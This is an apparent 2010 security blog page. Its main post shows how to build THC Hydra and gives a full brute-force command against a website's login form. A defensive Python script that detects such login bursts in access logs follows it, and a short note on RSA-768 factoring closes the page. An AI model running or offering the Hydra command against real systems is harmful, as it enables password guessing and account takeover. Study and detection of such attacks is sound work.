Pages

What Programming Language Should I Use to Build a Startup?

Often entrepreneurs ask me 'What technology should I build my startup on?' There is no right or wrong answer to this question. It's a decision every company makes for itself, depending on what it's trying to build and the skills of its cofounders. Nonetheless, there are a few rules that one should adhere to. We discuss them in this blog post.

Incident Response Policy

What happens in your company when a production incident occurs? Usually in a typical startup, you will see engineers running around frantically trying to resolve the problem. However, as soon as the incident is resolved, they forget about it and go back to their usual business. A good incident response policy can help bring order into chaos. We provide a sample template in this blog post.

Why Software Deadlines Never Make Sense

We discuss why software deadlines usually don't make sense.

Analyzing Front-End Performance With Just a Browser

We discuss a number of freely available online tools which can be used to analyze bottlenecks in your website.

Why Smaller Businesses Can't Ignore Security and How They Can Achieve It On a Budget

In this article, we show that security is both important and achievable for smaller companies without breaking the bank.

Saturday, February 20, 2010

Using THC Hydra to bruteforce passwords

I've started experimenting with THC Hydra to brute-force passwords on my home Ubuntu box.

1. First, install the OpenSSL and GTK development packages that Hydra needs to build:
sudo apt-get install libssl-dev libgtk2.0-dev

2. Next, download the Hydra source code:
wget -c http://freeworld.thc.org/releases/hydra-5.4-src.tar.gz

3. Unpack the archive:
tar -xzvf hydra-5.4-src.tar.gz
cd hydra-5.4-src/

4. Compile Hydra, removing the PostgreSQL module from the Makefile:
./configure
vi Makefile    # remove the "-lpq" and "-DLIBPOSTGRES" entries
make

5. Run Hydra against the login form:
hydra -L users.txt -P password.txt -e ns -vV -t 1 site.com http-post-form "/bb/login:email=^USER^&password=^PASS^:Not allowed"
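Seen from the other side of the login form, a run like the one above shows up in the web server log as a burst of POST requests to the same path from one client. The detector below is an added example (my own code, not part of the original post or of Hydra): it counts POSTs to the login path per source address in a sliding window and flags any address that exceeds a threshold. The log lines are constructed samples in Apache "combined" format, the login path is the post's /bb/login, and the threshold and window values are assumptions to tune for your own traffic. Note that because the failure page in the post is recognised by its body text ("Not allowed"), failed attempts may come back as HTTP 200, so the detector deliberately counts requests rather than relying on status codes.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample access-log lines (Apache combined format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [20/Feb/2010:10:00:01 +0000] "POST /bb/login HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [20/Feb/2010:10:00:02 +0000] "POST /bb/login HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [20/Feb/2010:10:00:03 +0000] "POST /bb/login HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.5 - - [20/Feb/2010:10:00:03 +0000] "POST /bb/login HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [20/Feb/2010:10:00:04 +0000] "POST /bb/login HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [20/Feb/2010:10:00:05 +0000] "GET /bb/index HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.5 - - [20/Feb/2010:10:00:06 +0000] "POST /bb/login HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [20/Feb/2010:10:00:07 +0000] "POST /bb/login?next=/bb/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [20/Feb/2010:10:05:00 +0000] "POST /bb/login HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Apache combined format: client, identity, user, [timestamp], "METHOD PATH PROTO", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "method": m.group("method"),
        # Drop any query string so /bb/login?next=... still counts as the login path.
        "path": m.group("path").split("?", 1)[0],
        "status": int(m.group("status")),
    }


def detect_login_bursts(lines, login_path="/bb/login", threshold=5, window_seconds=60):
    """Return {ip: peak_count} for clients whose POSTs to login_path reach `threshold`
    within any `window_seconds` window. Status codes are ignored on purpose: a login
    form that reports failure in the page body answers failed attempts with HTTP 200."""
    attempts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST" or rec["path"] != login_path:
            continue
        attempts[rec["ip"]].append(rec["ts"])

    flagged = {}
    for ip, stamps in attempts.items():
        stamps.sort()
        recent = deque()  # timestamps inside the current sliding window
        peak = 0
        for ts in stamps:
            recent.append(ts)
            while (ts - recent[0]).total_seconds() > window_seconds:
                recent.popleft()
            peak = max(peak, len(recent))
        if peak >= threshold:
            flagged[ip] = peak
    return flagged


if __name__ == "__main__":
    for ip, count in detect_login_bursts(SAMPLE_LOG.splitlines()).items():
        print(f"{ip}: {count} login POSTs inside one window")
```

On the constructed sample, 203.0.113.5 is flagged with six attempts in a minute while 198.51.100.7, with two logins five minutes apart, is not. In production this logic would feed an alert or a temporary lockout for the flagged address, and the threshold should sit well above the retry rate of a forgetful human.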

768-bit RSA modulus has been factored

A rather exciting paper appeared on ePrint a few days ago: http://eprint.iacr.org/2010/006.pdf
A team of researchers succeeded in factoring a 768-bit RSA modulus.
In many practical applications today we use a larger 1024-bit RSA modulus for signatures and encryption, so this result raises the question: for how long will 1024-bit encryption and signatures remain secure? The authors claim they remain secure for the next three to four years, and suggest switching to a larger modulus, such as 2048 bits.

Friday, February 19, 2010

The security blog is born.

Today, I decided to create a blog with my ruminations on the theory and practical applications of information security. I hope that my readers will find it useful!